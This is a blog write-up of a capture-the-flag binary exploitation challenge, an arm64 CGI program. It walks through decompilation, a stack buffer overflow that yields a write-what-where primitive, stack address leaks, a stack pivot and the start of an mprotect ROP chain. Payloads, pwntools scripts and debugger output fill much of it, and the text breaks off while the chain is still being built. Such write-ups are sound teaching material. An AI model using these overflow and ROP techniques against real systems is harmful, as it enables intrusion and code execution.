ElBlo

[pwn] SRLabs CTF: baby arm

September 6, 2023

url: https://hackingchallenge.srlabs.de/challenges

Description

The challenge is served over a CGI-bin arm64 program. It’s a C program that parses the request body as key=value pairs. It then prints a greeting for every name=something pair that appears in the request body.

TL;DR (skip if you don’t want spoilers)

The key-value pairs are copied out of the buffer into two arrays (keys, values). You can exploit a buffer overflow to control where the key gets copied, but the target has to be “close” on the stack. You also cannot write NUL bytes, & or =.

If you provide the maximum number of key-value pairs (0x34), you will still have plenty of space in the buffer and the stack address will be leaked into x7.

Using the buffer overflow, overwrite some values on the stack to make a rop chain to pivot the stack onto the value in x7. From there, continue ropping until you get what you want.

Program Analysis.

`main` disassembly

Decompiling the main function with Ghidra has some problems, so feel free to skip reading it.

int main(void) {
  undefined *puVar1;
  int cmp;
  ssize_t read_n;
  undefined8 unaff_x19;
  char *keys;
  undefined8 unaff_x20;
  char *values_iter;
  undefined8 unaff_x21;
  undefined8 unaff_x22;
  undefined8 unaff_x23;
  undefined8 unaff_x24;
  undefined8 unaff_x29;
  undefined8 unaff_x30;
  undefined auStack_60000 [393216];
  bool found_name;
  undefined *global_data;
  char *values_start;
  
  global_data = (undefined *)register0x00000008;
  do {
    puVar1 = global_data;
    *(undefined8 *)(puVar1 + -0xfc00) = 0;
    global_data = puVar1 + -0x10000;
  } while (puVar1 + -0x10000 != auStack_60000);
  *(undefined8 *)(puVar1 + -0x15950) = unaff_x29;
  *(undefined8 *)(puVar1 + -0x15948) = unaff_x30;
  *(undefined8 *)(puVar1 + -0x15940) = unaff_x19;
  *(undefined8 *)(puVar1 + -0x15938) = unaff_x20;
  *(long *)(puVar1 + 0x4fff8) = __stack_chk_guard;
  read_n = read(0,puVar1 + 0x1d378,0x32c80);
  puts("Content-type: text/html\n");
  if ((int)read_n < 1) {
    puts("<h1>Please provide your name with the name= parameter.</h1>");
  }
  else {
    *(undefined8 *)(puVar1 + -0x15930) = unaff_x21;
    *(undefined8 *)(puVar1 + -0x15928) = unaff_x22;
    keys = puVar1 + -0x15908;
    values_start = puVar1 + 0x3d38;
    *(undefined8 *)(puVar1 + -0x15920) = unaff_x23;
    *(undefined8 *)(puVar1 + -0x15918) = unaff_x24;
    found_name = false;
    parse_body(puVar1 + 0x1d378,keys,values_start,puVar1 + -0x1590c);
    values_iter = values_start;
    do {
      while( true ) {
        if (*keys == '\0') goto LAB_00400628;
        cmp = strncmp(keys,"name",4);
        if (cmp != 0) break;
        keys = keys + 2000;
        printf("<h1>Hello, %s!</h1>\n",values_iter);
        values_iter = values_iter + 2000;
        found_name = true;
        if (keys == values_start) goto LAB_00400628;
      }
      keys = keys + 2000;
      values_iter = values_iter + 2000;
    } while (keys != values_start);
LAB_00400628:
    if (found_name) {
      unaff_x21 = *(undefined8 *)(puVar1 + -0x15930);
      unaff_x22 = *(undefined8 *)(puVar1 + -0x15928);
      unaff_x23 = *(undefined8 *)(puVar1 + -0x15920);
      unaff_x24 = *(undefined8 *)(puVar1 + -0x15918);
    }
    else {
      puts("<h1>What is your name?</h1>");
      unaff_x21 = *(undefined8 *)(puVar1 + -0x15930);
      unaff_x22 = *(undefined8 *)(puVar1 + -0x15928);
      unaff_x23 = *(undefined8 *)(puVar1 + -0x15920);
      unaff_x24 = *(undefined8 *)(puVar1 + -0x15918);
    }
  }
  if (*(long *)(puVar1 + 0x4fff8) - __stack_chk_guard == 0) {
    return 0;
  }
  *(undefined8 *)(puVar1 + -0x15930) = unaff_x21;
  *(undefined8 *)(puVar1 + -0x15928) = unaff_x22;
  *(undefined8 *)(puVar1 + -0x15920) = unaff_x23;
  *(undefined8 *)(puVar1 + -0x15918) = unaff_x24;
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail(&__stack_chk_guard,0,puVar1 + 0x4e6b0,
                   *(long *)(puVar1 + 0x4fff8) - __stack_chk_guard);
}

If you provide no input, it will print a message.
There are three arrays, keys, values, and read_buffer.
- keys comes first, with 0x34 entries of 2000 bytes each. Used to store the keys of the body.
- values is next, with 0x34 entries of 2000 bytes each. Used to store the values associated with the keys.
- read_buffer is where our input gets copied to, it has a size of 0x32c80 bytes.
After reading the input, main calls parse_body, passing the three arrays.
When that’s done, main will iterate over keys and values, and print all the values whose key has name as a prefix.
At the end, if no name was printed, the program will print <h1>What is your name?</h1>.
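The sizes above can be cross-checked against the offsets in the decompiled main. The following is a small sketch that only uses constants copied from the listing; the variable names are mine and do not come from the binary.

```python
ENTRY_SIZE = 2000   # bytes per key slot or value slot
MAX_PAIRS = 0x34    # number of slots in each array

# Offsets relative to puVar1, copied from the decompiled main.
KEYS_OFF = -0x15908
VALUES_OFF = 0x3d38
READ_BUF_OFF = 0x1d378
READ_SIZE = 0x32c80

array_size = ENTRY_SIZE * MAX_PAIRS

# keys is directly followed by values, and values by the read buffer.
assert VALUES_OFF - KEYS_OFF == array_size
assert READ_BUF_OFF - VALUES_OFF == array_size
# The read buffer is exactly as large as both arrays together.
assert READ_SIZE == 2 * array_size

print(hex(array_size))
```

All three assertions hold, which suggests the three arrays are laid out back to back in main's stack frame.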

Now, let’s look at parse_body.

`parse_body` disassembly

void parse_body(char* body,char* keys,char *values, undefined4* param_4) {
  char* src;
  size_t len;
  long i;
  int count;
  char* saveptr = NULL;
  char* kv_ptr = NULL;
  char dst[32] = {0};
  char* key_ptr = NULL;
  char* value_ptr = NULL;
  uint64_t stack_canary = __stack_chk_guard;
  char c;
  
  src = strtok_r(body, "&", &saveptr);
  if (src == NULL) {
    *param_4 = 0xffffffff;
    kv_ptr = NULL;
  } else {
    count = 0;
    do {
      kv_ptr = src;
      key_ptr = keys;
      value_ptr = values;
      len = simd_strlen(src);
      // This can overflow dst and overwrite key_ptr and value_ptr
      strncpy(&dst, src, len & 0xffffffff);
      i = 0;
      do {
        // Copy key into key_ptr (points to keys)
        c = src[i];
        if (c == '=' || c == '\0') break;
        key_ptr[i] = c;
        i += 1;
        src = kv_ptr;
      } while (i != 2000);
      // Copy value into value_ptr (points to values)
      kv_ptr = strchr(&dst, L'=');
      if (kv_ptr != NULL) {
        strncpy(value_ptr, kv_ptr + 1, 2000);
        value_ptr[1999] = '\0';
      }
      count += 1;
      src = strtok_r(NULL, "&", &saveptr);
      keys = keys + 2000;
      values = values + 2000;
      kv_ptr = src;
    } while (count != 0x34 && src != NULL);
  }
  if (stack_canary - __stack_chk_guard == 0) {
    return;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail(&__stack_chk_guard,0,stack_canary - __stack_chk_guard);
}

The function parse_body is in charge of parsing the input buffer into the key-value pair arrays.
- It uses strtok_r to split the body on & chars.
- For every token, it will:
  - Copy the current keys and values pointers onto the stack (key_ptr and value_ptr).
  - Copy the token from the read buffer, up to the next &, into a stack buffer (dst).
  - Copy from the read buffer into the address pointed to by key_ptr, until it finds either a NUL byte or an =.
  - Look for an = in the dst buffer and strncpy what follows it into the address pointed to by value_ptr, up to 2000 chars.
  - Note that both key_ptr and value_ptr can be overwritten if our input is too long.
- This is repeated 0x34 times, or until there are no more tokens.
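To make the overflow concrete, here is a rough Python model of the relevant part of parse_body's stack frame. It assumes the layout suggested by the decompilation (dst, then key_ptr, then value_ptr) and uses made-up pointer values (0x1000, 0x2000); it is an illustration, not a faithful emulation of the binary.

```python
import struct

DST_SIZE = 32  # size of dst in parse_body

def simulate_token_copy(token: bytes, key_ptr: int, value_ptr: int):
    """Model strncpy(dst, token, strlen(token)) over dst, key_ptr, value_ptr."""
    # Assumed layout: dst[32], then key_ptr, then value_ptr.
    frame = bytearray(DST_SIZE) + struct.pack('<QQ', key_ptr, value_ptr)
    n = min(len(token), len(frame))  # the model stops before the canary
    frame[:n] = token[:n]
    return struct.unpack_from('<QQ', frame, DST_SIZE)

# Hypothetical pointer values, chosen only for readability.
short = simulate_token_copy(b'name=test', 0x1000, 0x2000)
long_ = simulate_token_copy(b'k=' + b'a' * 30 + b'\x34\x12', 0x1000, 0x2000)

print([hex(p) for p in short])  # both pointers untouched
print([hex(p) for p in long_])  # low two bytes of key_ptr replaced
```

A token of 32 bytes or fewer leaves both pointers alone; every byte past 32 lands in key_ptr first, starting with its least significant byte.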

Other details

The binary is not PIE. It is always loaded at the same address, but the stack is randomized.
We have some control over the environment variables, for example, the user agent that we set in our request will end up as an env var.
The read call for reading the request body is very large, but in reality we will only be able to read ~32k bytes.
There’s a limit of 0x34 key-value pairs that will be processed.

Exploit Ideas

With all these details, one possible attack is to use the write-what-where primitive to change some of the return addresses to start ropping, and then pivot our stack to the read_buffer to run a longer rop chain. Sadly, our read_buffer is too far away from where key_ptr points, so we will need to figure out a way to work around that.

Another challenge is that, on each iteration of the loop in parse_body, the key and value ptrs increment by 2000, so the pointer that we are modifying keeps changing.

Let’s set up everything so we can start playing with this challenge :)

Remote Setup, with requests library.

Trying this challenge is super easy, we just need to make a simple web request:

import requests

def run_remote(payload):
    url = 'http://5.75.229.171:1337/cgi-bin/pwn.cgi'
    return requests.post(url, data=payload).content

>>> run_remote(b'name=test')
b'<h1>Hello, test!</h1>\n'

You can also change the request headers, but this seems to be good enough for now.

Local Setup with usermode QEMU.

Given that I don’t have an arm64 machine, the easiest way to study the binary locally is to use usermode QEMU. This is a QEMU mode in which userspace code gets emulated, while kernel code gets routed to the real linux kernel.

Note that usermode QEMU doesn’t provide a security boundary or isolation in any way. Don’t use it to run untrusted binaries.

~/ctf/srelabs/pwn$ echo -n "name=test" | qemu-aarch64 pwn.cgi
Content-type: text/html

<h1>Hello, test!</h1>

Limitations

Note that this setup has various limitations:

It doesn’t seem to have aslr, which causes the stack to always be in the same place.
- This can be helpful to iterate fast and get an exploit working, but our solution needs to work with aslr eventually.
- Note that we can simulate some randomness by messing with environment variables when we start the program.
The memory mappings might not be the same ones as in the real program. QEMU doesn’t provide an easy way of printing the memory mappings either.
- One option that I found useful was to check /proc/pid/maps on the QEMU process: the program was loaded on the lower end of the address space.
- Some failures might not show up correctly. For example, if the program tries to write outside of the low-memory area, it might cause issues with QEMU or might not be reported correctly.
This is not the same setup as with the CGI-bin script.
- Our input is actually an HTTP request. We have control over some headers that end up in the environment variables.
- The output of the program must start with a content type header: Content-Type: text/plain\n\n.
- Apache reads our entire request in one go and sends it to the program.
  - For example, one way to defeat aslr could be to make the program print a stack address, and then override a return address to execute main again, causing it to read our input again with the same memory layout. This wouldn’t work on a CGI-bin script.

strace

Usermode QEMU also has an option for logging the system calls:

~/ctf/srelabs/pwn$ echo -n "name=test" | qemu-aarch64 -strace pwn.cgi
10903 brk(NULL) = 0x000000000049a000
10903 brk(0x000000000049ab78) = 0x000000000049ab78
10903 set_tid_address(4825296,4821024,4825280,4825536,4778064,4827120) = 10903
10903 set_robust_list(4825312,24,4825312,1,0,4825360) = -1 errno=38 (Function not implemented)
10903 Unknown syscall 293
10903 uname(0x5500800078) = 0
10903 prlimit64(0,3,0,365080609256,4827160,88) = 0
10903 readlinkat(AT_FDCWD,"/proc/self/exe",0x00000055007ff130,4096) = 38
10903 getrandom(4820672,8,1,4825088,4786664,0) = 8
10903 brk(0x00000000004bbb78) = 0x00000000004bbb78
10903 brk(0x00000000004bc000) = 0x00000000004bc000
10903 mprotect(0x000000000048e000,16384,PROT_READ) = 0
10903 read(0,0x7cd468,208000) = 9
10903 newfstatat(1,"",0x000000550079a638,0x1000) = 0
Content-type: text/html
10903 write(1,0x49b020,24) = 24

10903 write(1,0x49b020,1) = 1
<h1>Hello, test!</h1>
10903 write(1,0x49b020,22) = 22
10903 exit_group(0)

gdb

Another good thing about usermode qemu: it lets us hook a debugger to our process.

Make sure you have gdb-multiarch installed

$ sudo apt install gdb-multiarch

Launch qemu with the gdb flag:

$ echo -n "name=marco" | env -i qemu-aarch64 -g 1234 ./pwn.cgi

And then launch gdb and connect to it:

$ gdb-multiarch ./pwn.cgi
...
(gdb) target remote :1234
Remote debugging using :1234
0x0000000000400700 in _start ()
(gdb) c

pwntools

Using pwntools to work on the exploit will be a real time saver.

Given that our payload cannot be dynamic, the setup to run it with pwntools is easy:

$ python3 -m pip install pwntools

import pwn
pwn.context.update(arch='aarch64', os='linux')
pwn.context.log_level = 'critical'

def run(payload):
    with pwn.process(['qemu-aarch64', './pwn.cgi'], env={}) as target:
        target.send(payload)
        return target.recvall()

def run_with_strace(payload):
    with pwn.process(['qemu-aarch64', '-strace', './pwn.cgi'], env={}) as target:
        target.send(payload)
        return target.recvall()

def run_with_gdb(payload):
    with pwn.process(['qemu-aarch64', '-g', '1234', './pwn.cgi'], env={}) as target:
        target.send(payload)
        return target.recvall()

Improving our understanding of the problem

We have decompiled the program, have a reasonable understanding of how it works, and have the tools to play with it locally. Let’s see what we can learn about it.

Confirming the `dst` buffer size.

First, let’s double check the size of the dst buffer in parse_body:

>>> from pwnlib.util.cyclic import cyclic, cyclic_find
>>> print(run(b'name=' + cyclic(10)).decode())
Content-type: text/html

<h1>Hello, aaaabaaaca!</h1>
>>> print(run(b'name=' + cyclic(100)).decode())
Content-type: text/html

qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Let’s see with strace:

>>> print(run_with_strace(b'name=' + cyclic(100)).decode())
(...)
11337 write(1,0x49b020,24) = 24

11337 write(1,0x49b020,1) = 1
--- SIGSEGV {si_signo=SIGSEGV, si_code=1, si_addr=NULL} ---
qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Sadly, this is one of the issues I mentioned earlier about usermode QEMU: the segmentation fault is happening in a memory region outside the program’s allowed address space, and QEMU is not reporting it. Let’s shrink our payload until we see a crashing address:

>>> print(run_with_strace(b'name=' + cyclic(34)).decode())
(...)
Content-type: text/html
11354 write(1,0x49b020,24) = 24

11354 write(1,0x49b020,1) = 1
--- SIGSEGV {si_signo=SIGSEGV, si_code=1, si_addr=0x0000696161616861} ---
qemu: uncaught target signal 11 (Segmentation fault) - core dumped

With the address, we can now get the offset:

>>> pwn.p64(0x0000696161616861)
b'ahaaai\x00\x00'
>>> cyclic_find(b'ahaaai\x00\x00')
27

This means that our buffer has a size of 27+5 = 32 bytes. ✅︎
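The same offset can be reproduced without pwntools. The sketch below hardcodes the first 34 bytes of pwntools' default cyclic pattern and searches for the bytes of the faulting address; the variable names are mine.

```python
import struct

# First 34 bytes of pwntools' default cyclic pattern (alphabet a-z, n=4).
PATTERN = b'aaaabaaacaaadaaaeaaafaaagaaahaaaia'
PREFIX = b'name='
fault_addr = 0x0000696161616861  # si_addr from the strace output

# The pointer is stored little-endian; drop the zero bytes at the top.
needle = struct.pack('<Q', fault_addr).rstrip(b'\x00')
offset = PATTERN.find(needle)
dst_size = len(PREFIX) + offset

print(needle, offset, dst_size)
```

The pattern offset (27) plus the 5 bytes of name= gives the 32 bytes that fit in dst before key_ptr starts being overwritten.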

Print the keys pointers.

From reading the decompiled source code, we know that it will write the keys from src, and the values from the dst buffer (everything after the first =) with a strncpy. No NUL byte gets copied into dst (the copy covers everything up to a NUL byte or an &), so if our key-value pair is exactly 32 bytes long, the values array should receive our value plus whatever follows dst on the stack, up to the first NUL byte. Furthermore, if we use name as the key, the program will print it out at the end.

This is the code I am talking about:

  // Copy value into value_ptr (points to values)
  kv_ptr = strchr(&dst, L'=');
  if (kv_ptr != NULL) {
    strncpy(value_ptr, kv_ptr + 1, 2000);
    value_ptr[1999] = '\0';
  }

Let’s see what happens:

>>> run(b'name=' + b'a' * (32-5))
b'Content-type: text/html\n\n<h1>Hello, aaaaaaaaaaaaaaaaaaaaaaaaaaa\xb8\xb3y!</h1>\n'
>>> x = b'\xb8\xb3y' + b'\x00' * 8
>>> hex(pwn.u64(x[:8]))
'0x79b3b8'

After our name (all a’s), there are some extra bytes. Those are the bytes of keys_ptr up to its first NUL byte. Usermode QEMU places the stack at addresses like 0x5500aabbcc, where the fourth byte is NUL, so we only see the lowest 3 bytes. If we run it against the real website, we get more of the pointer.

>>> run_remote(b'name=' + b'a' * (32-5))
b'<h1>Hello, aaaaaaaaaaaaaaaaaaaaaaaaaaa\xb8\xe0d\xc5\xff\xff!</h1>\n'
>>> x = b'\xb8\xe0d\xc5\xff\xff' + b'\x00' * 8
>>> hex(pwn.u64(x[:8]))
'0xffffc564e0b8'

Note that we can use the same name multiple times, and thus, leak all the addresses from the keys array:

def leak_keys_addresses():
    payload = b'name=' + b'a'*27
    payloads = [payload]*0x35 # one more for good measure.
    payload = b'&'.join(payloads)

    response = run(payload) # run() already returns the raw response bytes.
    for line in response.split(b'\n'):
        if b'aaaaaaaaaaaaaaaaaaaaaaaaaaa' not in line: continue
        line = line[38:-6] # Take out the 38-char prefix and these 6 chars: !</h1>
        ptr = line + b'\x00'*8
        ptr = pwn.u64(ptr[:8])
        print(hex(ptr))

>>> leak_keys_addresses()
0x79b3b8
0x79bb88
0x79c358
(...)
0x7b3a58
0x7b4228

And we can see that each of them is 2000 bytes apart:

>>> 0x79bb88 - 0x79b3b8
2000

✅︎
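As a cross-check, here is a standard-library-only sketch that decodes the two leaked lines shown earlier and predicts every slot address from the first one. The helper name decode_leak is mine; the byte strings are copied from the outputs above.

```python
import struct

ENTRY_SIZE = 2000
PREFIX = b'<h1>Hello, ' + b'a' * 27
SUFFIX = b'!</h1>'

def decode_leak(line: bytes) -> int:
    """Extract the pointer bytes printed right after the 27 a's."""
    raw = line[len(PREFIX):-len(SUFFIX)]
    # Pad with zeros: the print stopped at the pointer's first NUL byte.
    return struct.unpack('<Q', raw.ljust(8, b'\x00')[:8])[0]

local = decode_leak(PREFIX + b'\xb8\xb3y' + SUFFIX)
remote = decode_leak(PREFIX + b'\xb8\xe0d\xc5\xff\xff' + SUFFIX)
print(hex(local), hex(remote))

# Slot i of the keys array should sit at base + i * 2000.
slots = [local + i * ENTRY_SIZE for i in range(0x34)]
assert slots[1] == 0x79bb88 and slots[-1] == 0x7b4228
```

The predicted second and last slots match the addresses printed by leak_keys_addresses, consistent with a flat array of 0x34 entries.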

Analyzing the memory layout with gdb.

We can launch gdb and stop at the beginning of parse_body to analyze the parameters.

(gdb) target remote :1234
Remote debugging using :1234
0x0000000000400700 in _start ()
(gdb) b parse_body
Breakpoint 1 at 0x400868
(gdb) c
Continuing.

Breakpoint 1, 0x0000000000400868 in parse_body ()
(gdb) p /x $x0
$1 = 0x55007ce038
(gdb) p /x $x1
$2 = 0x550079b3b8
(gdb) p /x $x2
$3 = 0x55007b49f8
(gdb) p /x $x3
$4 = 0x550079b3b4
(gdb) p /x $sp
$5 = 0x550079b2d0

x0 is our read buffer. x1 is the beginning of the keys array. x2 is the beginning of the values array. I am not clear on what x3 is used for.

(gdb) p /x $x1 + (2000 * 0x34)
$6 = 0x55007b49f8
(gdb) p /x $x2 + (2000 * 0x34)
$7 = 0x55007ce038

Also, the values array starts right where the keys array ends, and the input buffer starts right where the values array ends.

This is the code at the beginning of parse_body:

(gdb) x /20i parse_body
   0x400860 <parse_body>:       stp     x29, x30, [sp, #-160]!
   0x400864 <parse_body+4>:     adrp    x4, 0x491000 <tunable_list+1320>
=> 0x400868 <parse_body+8>:     movi    v0.4s, #0x0
   0x40086c <parse_body+12>:    mov     x29, sp

The stack frame takes 160 bytes, and x29 and x30 are stored at the top of it (at sp and sp + 8).

Something that also interests us, is the function epilogue, to see how the values from the stack are restored and what we have control over.

   0x400998 <parse_body+312>:   ldp     x19, x20, [sp, #16]
   0x40099c <parse_body+316>:   ldp     x21, x22, [sp, #32]
   0x4009a0 <parse_body+320>:   ldp     x23, x24, [sp, #48]
   0x4009a4 <parse_body+324>:   ldp     x29, x30, [sp], #160
   0x4009a8 <parse_body+328>:   ret

To get a complete view, let’s set a breakpoint in the middle of the function and analyze the stack.

(gdb) x /20i $pc
=> 0x4008f4 <parse_body+148>:   ldr     x1, [sp, #136]
   0x4008f8 <parse_body+152>:   strb    w0, [x1, x2]
   0x4008fc <parse_body+156>:   add     x2, x2, #0x1
   0x400900 <parse_body+160>:   cmp     x2, #0x7d0

This is where the character c from the key is stored into the memory pointed to by key_ptr, which lives at sp + 136 (0x88).

Now, let’s print the stack contents (with some notes):

(gdb) x /40gx $sp
0x550079b2d0:   0x000000550079b370      0x00000000004005d8 x29, x30
0x550079b2e0:   0x000000550079b3b8      0x00000055007b49f8 x19, x20
0x550079b2f0:   0x0000000000458270      0x00000055007b49f8 x21, x22
0x550079b300:   0x0000000000458278      0x0000000000000000 x23, x24
0x550079b310:   0x0000000000000018      0x00000000004925c8
0x550079b320:   0x0000000000493c30      0x00000055007ce042
0x550079b330:   0x00000055007ce038      0x72616d3d656d616e dst
0x550079b340:   0x0000000000006f63      0x0000000000000000
0x550079b350:   0x0000000000000000      0x000000550079b3b8 keys_ptr (sp + 0x88)
0x550079b360:   0x00000055007b49f8      0xa36829a47092db00 values_ptr, stack canary
0x550079b370:   0x0000005500800cc0      0x0000000000400a64 main's stack.

Exploiting the buffer overflow (no aslr)

In this run, the value of keys_ptr is 0x550079b3b8, and parse_body’s return address is stored in 0x550079b2d8. This means that if we can overwrite the first two bytes of keys_ptr with b2d8, we should be able to jump to wherever we want.
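The partial overwrite can be computed rather than read off by eye. This is a sketch with a hypothetical helper, low_bytes_for, that checks two things: that the target only differs from the current pointer in the bytes we overwrite, and that the patch avoids the bytes we cannot write (NUL, &, =).

```python
FORBIDDEN = b'\x00&='  # bytes we cannot write, per the TL;DR

def low_bytes_for(current_ptr: int, target: int, n: int = 2) -> bytes:
    """Return the n low bytes that turn current_ptr into target."""
    mask = (1 << (8 * n)) - 1
    if current_ptr & ~mask != target & ~mask:
        raise ValueError('target differs above the overwritten bytes')
    patch = (target & mask).to_bytes(n, 'little')
    if any(b in FORBIDDEN for b in patch):
        raise ValueError('patch contains a forbidden byte')
    return patch

keys_ptr = 0x550079b3b8
saved_x30 = 0x550079b2d8  # sp + 8 in the gdb dump

print(low_bytes_for(keys_ptr, saved_x30))
print(hex(keys_ptr - saved_x30))
```

In this run the saved return address sits 0xe0 bytes below the first keys slot, so a two-byte patch is enough to reach it.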

At the beginning of the main function, there’s a call to puts at address 0x400684:

if (read_bytes < 1) {
  puts("<h1>Please provide your name with the name= parameter.</h1>");
}

Remember: we need to provide a key=value pair, the value in the key will be copied to where keys_ptr is pointing, and we can overwrite it by providing a long value. Here we want the key to be 0x400684, and the value to overflow the first two bytes of keys_ptr with b2d8.

>>> payload = b'\x84\x06\x40=' + b'a' * 28 + b'\xd8\xb2'
>>> run(payload)
b'Content-type: text/html\n\n<h1>Please provide your name with the name= parameter.</h1>\n'

Success! ✅︎
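The payload above follows a fixed shape: the bytes to write, an =, padding up to 32 bytes, and then the new low bytes of keys_ptr. A small builder (make_token is a name I made up) makes that shape explicit and rejects bytes the parser would choke on.

```python
DST_SIZE = 32
FORBIDDEN = b'\x00&='  # bytes we cannot write, per the TL;DR

def make_token(what: bytes, where_low: bytes) -> bytes:
    """Build a key=padding token that writes `what` at the patched keys_ptr."""
    if len(what) >= DST_SIZE:
        raise ValueError('key does not fit in dst together with the =')
    for part in (what, where_low):
        if any(b in FORBIDDEN for b in part):
            raise ValueError('forbidden byte in payload')
    padding = b'a' * (DST_SIZE - len(what) - 1)  # -1 for the '='
    return what + b'=' + padding + where_low

token = make_token(b'\x84\x06\x40', b'\xd8\xb2')
assert token == b'\x84\x06\x40=' + b'a' * 28 + b'\xd8\xb2'
print(len(token))
```

Note that only three bytes of the return address are written here; this works because the remaining bytes of the original saved x30 are already zero.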

Note that we had to guess two bytes to put in the keys_ptr address. This will be problematic when we have to deal with aslr. But let’s ignore the elephant in the room for a while, and let’s think about how to exploit this issue.

We can see that if we can modify the x30 register on the stack, we can also modify the other registers (x19…x24, x29), and almost everything that is “close” in the stack, like main’s return address.

Stack Pivot

We also have a buffer in memory with arbitrary data. If we could pivot the stack to our buffer, we can chain any number of rop gadgets and take over from there.

Using ropper to find gadgets

There are a lot of tools to search for rop gadgets, let’s use ropper.

$ python3 -m pip install ropper

$ ropper -f pwn.cgi --search "mov sp"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: mov sp

[INFO] File: pwn.cgi
0x0000000000440408: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret; 
0x000000000040e408: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x60; ret; 
0x0000000000448d74: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret; 
0x0000000000441adc: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldr x23, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret; 
0x000000000044aed8: mov sp, x29; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x30; ret;

(Side note and useful tip, % works as a wildcard, and ? works as a single-character wildcard).

All of the gadgets move x29 into sp, so we need to modify the saved value of x29 in memory. Of those gadgets, the first one gives us the most control (little stack usage and the most registers loaded).

So let’s pick that one (address 0x440408), and overwrite x30 with it, and put our read address in x29. The addresses that we want to change are 0xb2d8 and 0xb2d0, respectively.

Now, we know that our read buffer is at 0x55007ce038, and the value stored for x29 is 0x550079b370, so we need to change 3 bytes in total. We also need to figure out what to put there. We can pad the message with 0s just so the calculations are easier. We could also use a rop sled such that no matter where we fall, we will eventually rop our way towards our destination.

Keep in mind that in aarch64, the stack pointer must be aligned to 16 bytes.

>>> hex(0x55007ce038 + 0x58)
'0x55007ce090'
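The offset does not have to be guessed. As a sketch, the helper below (pivot_offset, a hypothetical name) computes the smallest offset past the key-value tokens that keeps the pivoted stack pointer 16-byte aligned, using the read buffer address from the gdb session.

```python
def pivot_offset(buf_addr: int, prefix_len: int, align: int = 16) -> int:
    """Smallest offset >= prefix_len such that buf_addr + offset is aligned."""
    addr = buf_addr + prefix_len
    aligned = (addr + align - 1) & ~(align - 1)
    return aligned - buf_addr

read_buffer = 0x55007ce038
prefix_len = 2 * 34 + 1  # two 34-byte tokens joined by one '&'

off = pivot_offset(read_buffer, prefix_len)
print(hex(off), hex(read_buffer + off))

# The offset used in this post is larger, but also aligned.
assert (read_buffer + 0x58) % 16 == 0
```

Any aligned offset past the tokens should do, as long as the resulting address contains none of the forbidden bytes; 0x58 simply leaves some spare room.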

def rop():
  keyvals = [
    b'\x08\x04\x44=' + b'a'*28 + b'\xd8\xb2',
    b'\x90\xe0\x7c=' + b'a'*28 + b'\xd0\xb2',
  ]

  payload = b'&'.join(keyvals)
  payload += b'\x00' * (0x58 - len(payload))

  elf = pwn.ELF('./pwn.cgi')
  rop = pwn.ROP(elf)

  rop.raw(0xdeadbeef) # x29
  rop.raw(0x00400684) # x30
  rop.raw(0xdeadbeef) # x19
  rop.raw(0xdeadbeef) # x20
  rop.raw(0xdeadbeef) # x21
  rop.raw(0xdeadbeef) # x22
  rop.raw(0xdeadbeef) # x23
  rop.raw(0xdeadbeef) # x24

  payload += rop.chain()
  return payload

>>> payload = rop()
>>> payload
b'\x08\x04D=aaaaaaaaaaaaaaaaaaaaaaaaaaaa\xd8\xb2&\x90\xe0|=aaaaaaaaaaaaaaaaaaaaaaaaaaaa\xd0\xb2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\x84\x06@\x00\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00' 
>>> run(payload)
b'Content-type: text/html\n\n<h1>Please provide your name with the name= parameter.</h1>\nqemu: uncaught target signal 11 (Segmentation fault) - core dumped\n'

The address of the function to print the string was only present in our buffer, well after the end of the initial payload. This means that we were successful in doing a stack pivot and executing from there.

Building a rop-chain

Now that we can execute stuff out of our buffer, we can start building a rop chain that allows us to execute arbitrary code. Ideally, we would just want to open the flag and print it, but it seems easier to first add a bit more flexibility by allowing for arbitrary code execution.

Some alternatives:

mprotect our own stack mapping, allowing for RWX permissions.
mprotect the binary’s mappings, allowing for RWX permissions + copying our code there.
mmap something new, and copying our code there.

It all depends on what rop gadgets we can find. To me it was easier to go with the second option, so let’s go with that.

Making Linux system calls in aarch64 requires us to set the system call number in x8 and issue an svc #0 instruction.

Here are some rop gadgets with svc #0:

$ ropper -f pwn.cgi --search "svc #0"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: svc #0

[INFO] File: pwn.cgi
0x000000000041f45c: svc #0; cmn w0, #1, lsl #12; b.hi #0x1f470; mov w0, #0; ret; 
0x000000000041f388: svc #0; cmn x0, #0xfff; b.hs #0x1f398; ret; 
(...)
0x00000000004138e0: svc #0; ret;

We can also call mprotect directly, as it is in our binary:

(gdb) x /10i mprotect
   0x420440 <mprotect>: nop
   0x420444 <mprotect+4>:       mov     x8, #0xe2                       // #226
   0x420448 <mprotect+8>:       svc     #0x0
   0x42044c <mprotect+12>:      cmn     x0, #0xfff
   0x420450 <mprotect+16>:      b.cs    0x420458 <mprotect+24>  // b.hs, b.nlast
   0x420454 <mprotect+20>:      ret
   0x420458 <mprotect+24>:      b       0x424900 <__syscall_error>

Which should save us from having to look up one extra gadget.

Return to x30

In aarch64, ret doesn’t pop anything from the stack; instead, the processor jumps to whatever is in the x30 register. So we need to take that into account when looking for gadgets.

